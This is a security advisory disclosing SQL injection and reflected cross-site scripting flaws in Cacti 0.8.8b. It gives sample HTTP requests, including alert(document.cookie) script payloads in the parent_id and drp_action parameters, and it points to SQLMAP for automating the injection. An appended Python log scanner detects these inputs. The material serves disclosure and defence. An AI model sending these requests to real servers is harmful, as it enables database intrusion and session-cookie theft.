Trustwave SpiderLabs Security Advisory TWSL2016-007:
Multiple Vulnerabilities in Cacti

Published: 04/20/2016
Version: 1.0

Vendor: The Cacti Group, Inc (http://www.cacti.net)
Product: Cacti
Version affected: 0.8.8b

Product description:
Cacti is a complete frontend to RRDTool. It stores all of the necessary information to create graphs and populate them with data in a MySQL database. The frontend is completely PHP driven. Along with being able to maintain Graphs, Data Sources, and Round Robin Archives in a database, Cacti handles the data gathering. There is also SNMP support for those used to creating traffic graphs with MRTG.

The discovered vulnerabilities were confirmed on Ubuntu 14.04.1 64-bit.

Finding 1: SQL Injection
Credit: Piotr Karolak of Trustwave SpiderLabs
CWE: CWE-89

The graph_template_input_id and graph_template_id parameters in the authenticated portion of Cacti do not properly sanitize input. As any user (Administrator or unprivileged), an SQL statement can be injected into the application at the location shown in the sample request. This vulnerability can be exploited in an automated manner using an SQL injection exploitation tool such as SQLMAP.

#Request
POST /cacti/graph_templates_inputs.php HTTP/1.1
Content-Length: 286
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://a.b.c.d:80/cacti/index.php
Cookie: Cacti=k1e5gud5e6b7fnaai3stclrql7
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

action=save&any_selected_item=&column_name=task_item_id&description=1&graph_template_id=10&graph_template_input_id=[SQL injection here]&name=oxxqftus&save_component_input=1

Finding 2: Cross-Site Scripting Vulnerability
Credit: Piotr Karolak of Trustwave SpiderLabs
CWE: CWE-79

1. The 'parent_id' parameter in Cacti is vulnerable to a cross-site scripting vulnerability when JavaScript is supplied via a GET request.
The exploitation example below uses the "alert()" JavaScript function to display the session cookie.

#Request:
GET /cacti/tree.php?action=item_edit&parent_id=0'>alert(document.cookie) HTTP/1.1
Referer: http://a.b.c.d:80/cacti/
Cookie: Cacti=qo7abeurhugh804a6l20f1ps90
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

2. The 'drp_action' parameter in Cacti is vulnerable to a cross-site scripting vulnerability when JavaScript is supplied via a POST request. The exploitation example below uses the "alert()" JavaScript function to display the session cookie. This can allow the attacker to access any cookies retained by the browser.

#Request:
POST /cacti/data_sources.php HTTP/1.1
Content-Length: 130
Content-Type: application/x-www-form-urlencoded
Referer: http://a.b.c.d:80/cacti/
Cookie: Cacti=qo7abeurhugh804a6l20f1ps90
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

action=actions&all=on&chk_3=on&chk_4=on&chk_5=on&chk_6=on&chk_7=on&drp_action=1'>alert(document.cookie)

Remediation Steps:
No official fix is available. However, these vulnerabilities can be mitigated with the use of a Web Application Firewall (WAF). Trustwave's WAF and ModSecurity solutions can provide out-of-the-box protections against these threats.

Revision History:
04/07/2015 - Attempt to contact vendor
05/06/2015 - Attempt to contact vendor
05/21/2015 - Attempt to contact vendor
12/28/2015 - Attempt to contact vendor, adding the cacti-user@sourceforge.net email address
04/11/2016 - Final attempt to contact vendor
04/20/2016 - Advisory published

References
1. https://www.owasp.org/index.php/SQL_Injection
2. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)#Reflected_XSS_Attacks
3. http://docs.cacti.net/ - Official Cacti Documentation Site
4. http://www.cacti.net/bugs.php - Bug Reporting

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risk.
With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
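Since the Remediation Steps above offer only WAF-side mitigation, the following is an added, defender-side example (not part of this advisory and not Cacti code) that turns the three sample requests from Findings 1 and 2 into a log check: every parameter the advisory names (graph_template_id, graph_template_input_id, parent_id, drp_action) is an integer id in normal Cacti use, so a request to the affected script carrying anything but digits in one of them is worth an alert. The log format, the field layout and the sample lines are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Endpoint -> parameters the advisory names that Cacti treats as integer ids.
NUMERIC_PARAMS = {
    "/cacti/graph_templates_inputs.php": ("graph_template_id", "graph_template_input_id"),
    "/cacti/tree.php": ("parent_id",),
    "/cacti/data_sources.php": ("drp_action",),
}

def suspicious_params(method, target, body=""):
    """Return (param, value) pairs for watched parameters whose value is not
    a plain unsigned integer. Query-string and POST-body values are both
    checked; blank values are ignored."""
    url = urlsplit(target)
    watched = NUMERIC_PARAMS.get(url.path)
    if not watched:
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    if method == "POST":
        params.update(parse_qs(body, keep_blank_values=True))
    return [(p, v) for p in watched for v in params.get(p, []) if v and not v.isdigit()]

def scan_log(lines):
    """Yield (line_no, method, path, hits) for lines that trip the check.
    Assumed (constructed) log format: '<method> <target> <status> [<POST body>]'."""
    for n, line in enumerate(lines, 1):
        parts = line.split(" ", 3)
        if len(parts) < 3:
            continue  # not a request line in the assumed layout
        method, target = parts[0], parts[1]
        body = parts[3] if method == "POST" and len(parts) == 4 else ""
        hits = suspicious_params(method, target, body)
        if hits:
            yield n, method, urlsplit(target).path, hits

# Constructed sample log lines modelled on the advisory's requests; not real traffic.
SAMPLE_LOG = [
    "GET /cacti/tree.php?action=item_edit&parent_id=12 200",
    "GET /cacti/tree.php?action=item_edit&parent_id=0%27%3Ealert(document.cookie) 200",
    "POST /cacti/graph_templates_inputs.php 200 action=save&graph_template_id=10&graph_template_input_id=5",
    "POST /cacti/graph_templates_inputs.php 200 action=save&graph_template_id=10&graph_template_input_id=1%27",
    "POST /cacti/data_sources.php 200 action=actions&all=on&chk_3=on&drp_action=1",
    "GET /cacti/index.php?parent_id=not-watched-here 200",
]

if __name__ == "__main__":
    for n, method, path, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {method} {path} -> {hits}")
```

The same integer-only rule is what a positive-validation WAF rule or a server-side cast to int in the affected handlers would enforce; the script only reports, it does not block.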